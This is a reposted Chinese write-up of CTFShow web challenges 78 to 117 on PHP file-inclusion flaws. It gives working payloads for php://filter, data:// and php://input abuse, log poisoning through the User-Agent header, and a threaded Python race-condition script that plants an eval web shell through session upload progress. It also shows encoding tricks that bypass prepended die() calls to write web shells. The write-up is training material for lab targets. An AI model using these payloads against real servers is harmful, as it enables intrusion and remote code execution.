主頁 >  其他 > CTFSHOW-檔案包含

CTFSHOW-檔案包含

2021-09-13 07:57:09 其他

目錄???????

??????????????WEB78

WEB79

WEB80

WEB81

WEB82-session檔案包含

WEB83

WEB84

WEB85

WEB86

WEB87

WEB88

WEB116

WEB117


???????WEB78

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

知識點:php偽協議

php://filter可以獲取指定檔案原始碼,當它與包含函式結合時,php://filter流會被當作php檔案執行,所以我們一般對其進行編碼,讓其不執行,從而導致 任意檔案讀取,

1、php://input

php://input可以訪問請求的原始資料的只讀流,將post請求的資料當作php代碼執行

與include連用、當傳入的引數作為檔案名打開時,可以將引數設為php://input,同時post想設定的檔案內容,php執行時會將post內容當作檔案內容,從而導致任意代碼執行,

phpinput不支持post提交,需要用raw方式

hackbar不支持raw方式

請求的引數格式是原生(raw)的內容

方法1:

直接構造:?file=flag.php ,沒有得到想要的結果,可能是被決議了

利用偽協議讀取檔案

payload:?file=php://filter/convert.base64-encode/resource=flag.php

然后base64解碼即可

方法2:

bp抓包,給file傳參?file=php://input然后在post輸出想要執行的代碼

WEB79

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

知識點:str_replace

分析:相對于上一題,$file中的php轉換了???即過濾了php,所以php協議不能用了

方法1:大小寫繞過(str_replace區分大小寫、str_ireplace不區分)

方法2:

data://協議

php5.2.0起,資料流封裝器開始有效,主要用于資料流的讀取,如果傳入的資料是PHP代碼,就會執行代碼

payload:?file=data://text/plain,<?= system('tac flag.???');?>
逗號后面是要執行的php代碼
或者
payload:?file=data://text/plain;base64,PD89IHN5c3RlbSgndGFjIGZsYWcuPz8/Jyk7Pz4=
逗號后面是要執行的php代碼的base64加密形式

注:data://可以用data:代替

WEB80

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

知識點:日志檔案包含,偽造UA寫入php代碼

日志檔案包含

日志檔案記錄了服務器收到的每一次請求的

IP、訪問時間、URL、User-Agent,這4項中的前兩項的值都是我們無法控制的,我們只能在自己可以控制的欄位上做手腳,其中URL欄位由于URL編碼的存在,空格等一些符號會自動進行url編碼,存到日志當中時,不是一個正確的php陳述句,無法成功執行,而User-Agent則不會被進行任何二次處理,我們發什么內容,服務器就將其原封不動的寫入日志,

訪問日志的位置和檔案名在不同的系統上會有所差異

apache一般是/var/log/apache/access.log
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

分析:php和data都被過濾了

方法1:繼續使用php大小寫繞過

方法2:日志檔案包含

nginx和apache的日志檔案包含也是一個考點

這個Linux的nginx日志檔案路徑是/var/log/nginx/access.log,要在用檔案包含漏洞讀取日志檔案的同時,修改ua頭為我們想要執行的命令(burp中go要點兩次才能執行命令,第一次將代碼寫入日志,第二次執行代碼

且操作一定不能出問題,如果報錯就要銷毀容器從頭再來

因為php語法錯誤后不再解釋執行后面代碼,語法錯誤后,后面不管語法對不對都不執行了,我們包含了日志檔案,如果日志檔案中我們插入了錯誤的php代碼,那么我們再次執行對的代碼時會先執行那個錯誤的php代碼,因為報錯,所以后面正確的就不會執行了,

先寫入日志

然后在包含日志、執行代碼,

方法3:遠程檔案包含

遠程檔案包含可以包含其他主機上的檔案,并當成php代碼執行,
要實作遠程檔案包含的話,php配置的allow_url_include = on必須為on

payload:?file=http://***.***.***.***/1.txt    

1.txt里面寫入代碼,

WEB81

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

分析:因為過濾了冒號,所以遠程檔案包含和大小寫繞過不行了,只能用日志包含

WEB82-session檔案包含

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

知識點:

session上傳進度

利用PHP_SESSION_UPLOAD_PROGRESS進行檔案包含

利用session.upload_progress進行檔案包含和反序列化滲透

分析:過濾了點,所以日志包含也不行了,

PHP里面唯一我們能控制的沒有后綴的檔案就是session檔案

利用PHP_SESSION_UPLOAD_PROGRESS寫入session檔案加條件競爭達到檔案包含的目的

1. session.upload_progress.enabled = on
2. session.upload_progress.cleanup = on(默認開啟)
3. session.upload_progress.prefix = "upload_progress_"(默認)
4. session.upload_progress.name = "$PHP_SESSION_UPLOAD_PROGRESS"(默認)

enabled=on表示upload_progress功能開始,也意味著當瀏覽器向服務器上傳一個檔案時,php將會把此次檔案上傳的詳細資訊(如上傳時間、上傳進度等)存盤在session當中 ;

cleanup=on表示當檔案上傳結束后,php將會立即清空對應session檔案中的內容

name當它出現在表單中,php將會報告上傳進度,最大的好處是,它的值可控也就是PHP_SESSION_UPLOAD_PROGRESS的值可控

prefix+name將表示為session中的鍵名,

方法:

大體思路為:

1、post一個與ini中設定的session.upload_progress.name的同名變數(默認的name為“PHP_SESSION_UPLOAD_PROGRESS”),那么就會回傳上傳檔案的實時進度并寫入session檔案中,session檔案的內容為:(它會在$_SESSION中添加一組資料, 索引是session.upload_progress.prefix與 session.upload_progress.name連接在一起的值

2、如果我們post傳遞PHP_SESSION_UPLOAD_PROGRESS的值為一句話木馬

比如為:<?php system('ls');?>

3、同時,我們在cookie里面設定名字:PHPSESSID,值:flag,(目的是設定session檔案,因為這樣我們才能知道實時進度(一句話木馬)上傳到哪里了);那么在/tem/sess_flag這個檔案的內容就為upload_progress_<?php system('ls')?>,然后在include(/tem/sess_flag)就會執行后面的php代碼從而成功執行rce,

4、雖然檔案上傳結束后,php會清空session檔案中的內容,但是如果我們邊上傳邊去訪問/tem/sess_aaa進行條件競爭,那么就有可能在洗掉session檔案前訪問到這個檔案,

我們能夠創建session檔案的原因:session里有一個默認選項,session.use_strict_mode默認值為off,也就是說此時用戶是可以自己定義Session ID的,比如,我們在Cookie里設定PHPSESSID=aaa,PHP將會在服務器上創建一個檔案:/tmp/sess_aaa”,即使此時用戶沒有初始化Session,PHP也會自動初始化Session,并產生一個鍵值,這個鍵值ini.get("session.upload_progress.prefix")+由我們構造的session.upload_progress.name值組成,最后被寫入sess_aaa檔案里,

注:在Linux系統中,session檔案一般的默認存盤位置為

/var/lib/php/session

/var/lib/php

/var/lib/php/sessions

/tmp/

/tmp/sessions/

本題型一律采用/tmp形式

但是session.upload_progress.cleanup默認是開啟的,一旦讀取了所有POST資料,它就會清除進度資訊,把我們session檔案里的內容全部洗掉,所以這里我們需要利用條件競爭來讀取session檔案,

bp抓包方法-手動爆破:

1、先構造一個上傳檔案的頁面,對環境上傳一個任意的檔案,內容也任意,然后抓包,

腳本如下:

<!DOCTYPE html>
<html>
<body>
<form action="http://26bfc8ed-f28a-46ef-94a6-bbff5bb92e6b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

2、 修改上傳檔案包

注意兩點:

(1)設定Cookie:PHPSEESSID=flag、這樣我們的session就為/tmp/sess_flag

(2)設定同名變數PHP_SESSION_UPLOAD_PROGRESS,設定值為我們想要存入session檔案的代碼,(把第一步中value=123的改掉即可,這里對123加上§§是為了進行爆破payload用)

3、包含session檔案,抓包

這里§a§是為了爆破payload用

4、進行爆破

將兩個爆破專案的payload設定如下:

payload數量可以設定10000次,也可以使用下面的無數次,

設定執行緒數(這里用了30)

然后一起爆破(先對上傳檔案包點擊attack,在對/tmp/sess_flag檔案包含包點擊attack,也可以不管順序,因為爆破次數有很多)

爆破結果:

最后將ls改成tac fl0g.php就行

腳本方法:

腳本:

import requests
import io
import threading

url='http://08d4a04e-19b3-4049-8a81-e9c6226eee2f.challenge.ctf.show:8080/'
#設定PHPSESSID的值
sessionid='ctfshow'     
data={"1":"file_put_contents('/var/www/html/tao.php','<?php eval($_POST[2]);?>');"}


#為了進行條件競爭,需要一邊寫一邊讀

#進行上傳檔案時需要post傳遞名為PHP_SESSION_UPLOAD_PROGRESS值為一句話木馬
def write(session):
	fileBytes = io.BytesIO(b'a'*1024*50)          #生產一個50k的檔案
	while True:
		response=session.post(url,
			data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'},
			cookies={'PHPSESSID':sessionid},
			files={'file':('ctfshow.jpg',fileBytes)}    #設定檔案名字和內容
			)



#讀取session檔案,這里檔案為/tmp/sess_ctfshow

def read(session):
	while True:
		response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data)
		response2=session.get(url+'tao.php');
		if response2.status_code==200:
			print('++++++++++++++++++++')
		else:
			print(response2.status_code)



if __name__=='__main__':

	#開啟多執行緒進行競爭	
	evnet=threading.Event()
	with requests.session() as session:			
		for i in range(20):
			threading.Thread(target=write,args=(session,)).start()
		for i in range(20):
			threading.Thread(target=read,args=(session,)).start()
	evnet.set()

出現+號后然后訪問url/tao.php,post傳參2=system('tac fl0g.php');

其他問題:

include包含檔案(不管是不是php檔案),如果這個檔案里面有php代碼是可以執行的,

WEB83

題目:

Warning: session_destroy(): Trying to destroy uninitialized session
 in /var/www/html/index.php on line 14
<?php
session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

分析:多了兩個函式

session_unset():
釋放當前在記憶體中已經創建的所有$_SESSION變數,但不洗掉session檔案以及不釋放對應的session_id

session_destroy():
洗掉當前用戶對應的session檔案以及釋放sessionid,記憶體中的$_SESSION變數內容依然保留, 也不會重置會話 cookie

表面上,按道理來說:這兩個函式都已經將有關session的東西都洗掉了,我們是無法進行session檔案包含的,但是:我們的腳本或者bp仍然能夠進行包含,原因在于多執行緒競爭的含義???????

知識點:

什么是多執行緒競爭

執行緒是非獨立的,同一個行程里執行緒是資料共享的,當當各個執行緒訪問資料資源時會出現競爭狀態即:

資料幾乎同步會被多個執行緒占用,造成資料混亂,即所謂的執行緒不安全 ,

這樣,因為在執行session_unset()與執行session_destroy()的時候有間隔,他們與include($file)直接也會有間隔,我們其中的一個執行緒在洗掉session檔案,而另一個執行緒剛剛又創建了一個session檔案,然后前面的執行緒又開始包含,那么還是能夠正常包含,

怎么解決多執行緒競爭問題?---鎖

鎖的好處: 確保了某段關鍵代碼(共享資料資源)只能由一個執行緒從頭到尾完整地執行能解決多執行緒資 源競爭下的原子操作問題,

鎖的壞處: 阻止了多執行緒并發執行,包含鎖的某段代碼實際上只能以單執行緒模式執行,效率就大大地下 降了

鎖的致命問題: 死鎖

方法:

還是web82的方法、同樣的道理:多執行緒競爭理解

WEB84

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    system("rm -rf /tmp/*");
    include($file);
}else{
    highlight_file(__FILE__);
}

system 這句話會洗掉/tem/下面的所有檔案,且不能恢復

-f:強制洗掉檔案或目錄;
-r或-R:遞回處理,將指定目錄下的所有檔案與子目錄一并處理;

還是web82的方法、同樣的道理:多執行緒競爭理解

WEB85

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    if(file_exists($file)){
        $content = file_get_contents($file);
        if(strpos($content, "<")>0){
            die("error");
        }
        include($file);
    }
    
}else{
    highlight_file(__FILE__);
}

知識點:

file_exists — 檢查檔案或目錄是否存在,如果由指定的檔案或目錄存在則回傳 true,否則回傳 false

file_get_contents — 將整個檔案讀入一個字串,函式回傳讀取到的資料, 或者在失敗時回傳 false

strpos — 查找字串首次出現的位置,回傳 needle 存在于 haystack 字串起始的位置(獨立于 offset),同時注意字串位置是從0開始,而不是從1開始的,如果沒找到 needle,將回傳 false

方法:

還是web82的方法、同樣的道理:多執行緒競爭理解

原因是:

session.upload_progress.cleanup = on(默認開啟)

cleanup=on表示當檔案上傳結束后,php將會立即清空對應session檔案中的內容

我們在設定session檔案后,被洗掉了,但是一個執行緒剛好進行if判斷,檔案存在,且檔案內容為空,那么就會準備執行include,同時另一個執行緒剛好設定了完整的session檔案,那么就會被包含進去,

WEB86

題目:

<?php

define('還要秀?', dirname(__FILE__));
set_include_path(還要秀?);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);

    
}else{
    highlight_file(__FILE__);
}

知識點:

define — 定義一個常量

dirname:回傳 path 的父目錄, 如果在 path 中沒有斜線,則回傳一個點('.'),表示當前目錄,否則回傳的是把 path 中結尾的/component(最后一個斜線以及后面部分)去掉之后的字串,

set_include_path — 設定include函式中 include_path 配置選項,成功時回傳舊的 include_path或者在失敗時回傳 false

include

被包含檔案先按引數給出的路徑尋找,如果沒有給出目錄(只有檔案名)時則按照 include_path指定的目錄尋找,如果在 include_path下沒找到該檔案則 include 最后才在呼叫腳本檔案所在的目錄和當前作業目錄下尋找,如果最后仍未找到檔案則 include 結構會發出一條警告;這一點和require 不同,后者會發出一個致命錯誤,

如果定義了路徑——不管是絕對路徑(在 Windows 下以盤符或者 \ 開頭,在 Unix/Linux 下以 / 開頭)還是當前目錄的相對路徑(以 . 或者 .. 開頭)——include_path都會被完全忽略,例如一個檔案以 ../ 開頭,則決議器會在當前目錄的父目錄下尋找該檔案,

方法:

還是web82的方法、同樣的道理:多執行緒競爭理解

因為設定了目錄/tmp/sess_flag,所以set_include_path對我們的腳本沒有用,

WEB87

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬別秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

知識點:

談一談php://filter的妙用???????

file_put_content和死亡·雜糅代碼之緣

file_put_contents — 將一個字串寫入檔案

通常一個字符是一個位元組,但是根據編碼不同,一個字符也可能等于兩個或者三個字符,

ASCII碼:
  一個英文字母(不分大小寫)占一個位元組的空間,一個中文漢字占兩個位元組的空間,

UTF-8編碼:
  一個英文字符等于一個位元組,一個中文(含繁體)等于三個位元組,

Unicode編碼:
  一個英文等于兩個位元組,一個中文(含繁體)等于兩個位元組,
  符號:
  英文標點占一個位元組,中文標點占兩個位元組,舉例:英文句號“.”占1個位元組的大小,中文句號“,”占2個位元組的大小,

base64編解碼

base64轉換后的字串的數量肯定是4的倍數, 不足4的末尾補‘=’

分析:

向檔案輸入內容的時候會在開頭寫入死亡函式,從而導致直接結束代碼的執行,我們要做的就是繞過這個死亡函式,

編碼時,轉換成Base64的最小單位就是3個位元組

解碼時,4個位元組為一組;PHP在解碼base64時,遇到不在其中的字符時,將會忽略這些字符,僅將合法字符組成一個新的字串進行解碼(Base64的字符選用了"A-Z、a-z、0-9、+、/" 64個可列印字符)所以,通過base64解碼過濾之后就只有 phpdie6 個字符我們就要添加2個字符讓phpdie和我們增加的兩個字符組合起來進行解碼,即可抹掉死亡函式,

其次:因為filename那里需要urldecode,而get傳參的時候會進行一次urldecode,所以我們的filename需要兩次urlencode,?file=php://filter/write=convert.base64-decode/resource=1.php這里需要進行url全編碼,不然php會被過濾掉,

將<?php eval($_POST[1]);?>進行base64編碼為:PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
注意如果直接傳入content,這里的+會被當做空格處理,所以在base64解碼的時候就會忽略空格,自動在后面加上一個=:即PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8=

解碼后:<?php eval($_POST[1]);? 這樣傳進去就會報錯

解決方法:將+進行urlencode

方法1:

payload:?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30

//即?file=php://filter/write=convert.base64-decode/resource=1.php
//對寫的內容進行base64編碼,

post:content=aaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B
//<?php eval($_POST[1]);?>
//這里加上兩個a是為兩和phpdie組成8個字符進行解碼,

最后訪問1.php、post輸入system('tac fl0g.php');即可

ps:strip_tags在php7.3.0以上的環境下會發生段錯誤,從而導致無法寫入,但是在php5的環境下則不受此影響

方法2:

利用rot13編碼

條件:在PHP不開啟short_open_tag(短標簽)時

payload:
?file=%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30

//?file=php://filter/write=string.rot13/resource=3.php
//對寫的內容進行rot13編碼,

content=<?cuc riny($_CBFG[1]);?>

//<?php eval($_POST[1]);?>
//rot13兩次解碼后會變成原來的樣子,所以我們將傳入的content進行一次rot13編碼,然后在寫入3.php的時候在進行rot13編碼,那么寫入檔案的時候就會寫入<?php eval($_POST[1]);?>,
//而<?php die('大佬別秀了');?>只會進行一次rot13編碼,寫入檔案的時候就不是一個正常的php代碼格式,

WEB88

題目:

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

分析:

這里沒有過濾data且沒有過濾:,所以我們可以使用data協議

方法:

payload:
?file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbJ21vbmljYSddKTs/Pnh4
post:monica=system('tac f*');

//?file=data://text/plain;base64,<?php eval($_POST['monica']);?>xx
這里在后面添加兩個xx是為了不讓后面的php代碼base64加密之后出現=,有幾個=就加幾個字符(其實也可以直接將=洗掉,因為base64在解碼的時候會自動洗掉=),如果加密后出現出現+就只能換一個php代碼,

WEB116

一道misc加簡單的檔案包含

方法:下載視頻,用binwalk打開(或者010editor),foremost分離,發現圖片,提取原始碼,傳參?file=flag.php,再下載視頻用winhex打開即可(或者傳參后用bp抓包)

WEB117

題目:

<?php

highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

分析:沒有過濾php,那么我們就可以通過php://filter/write來寫入檔案,然后通過編碼繞過死亡函式,因為這里過濾了base64和rot13,string,所以得用其他的編碼,

知識點:

用ucs-2編碼

更多編碼方式

convert.iconv.

這個過濾器需要 php 支持 iconv,而 iconv 是默認編譯的,使用convert.iconv.*過濾器等同于用iconv()函式處理所有的流資料, 然而 我們可以留意到 iconv — 字串按要求的字符編碼來轉換;;其用法:iconv ( string $in_charset , string $out_charset , string $str ) : string 將字串 strin_charset 轉換編碼到 out_charset, 就其功能而論,有點類似于base_convert的功效一樣,只不過二者還是有作用的區別,只是都是涉及編碼轉換的問題而已;(可以類比);由此記得國賽的一道love_math的題目,有了base_convert之后就可以盡情的轉換從而getshell;

那么我們就可以借用此過濾器,從而進行編碼的轉換,寫入我們需要的代碼,然后轉換掉死亡代碼,其實本質上來說也是利用了編碼的轉換;

方法:


payload:
get: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=monica.php
post:contents=?<hp pvela$(P_SO[T]1;)>?

//ucs大小寫都行

然后訪問monica.php 
post:1=system('tac f*');


//原理和rot13一樣,兩次轉換后變成了原來的樣子
echo iconv("UCS-2LE","UCS-2BE",'<?php die();?>?<hp pvela$(P_SO[T]1;)>?');

輸出如下,使得die失效,并且我們的一句話木馬可以使用
?<hp pid(e;)>?<?php eval($_POST[1]);?>

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/299609.html

標籤:其他

上一篇:App防止網路請求被代理抓包的解決方法

下一篇:Burp Suite如何攔截GET請求提交POET請求的引數

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

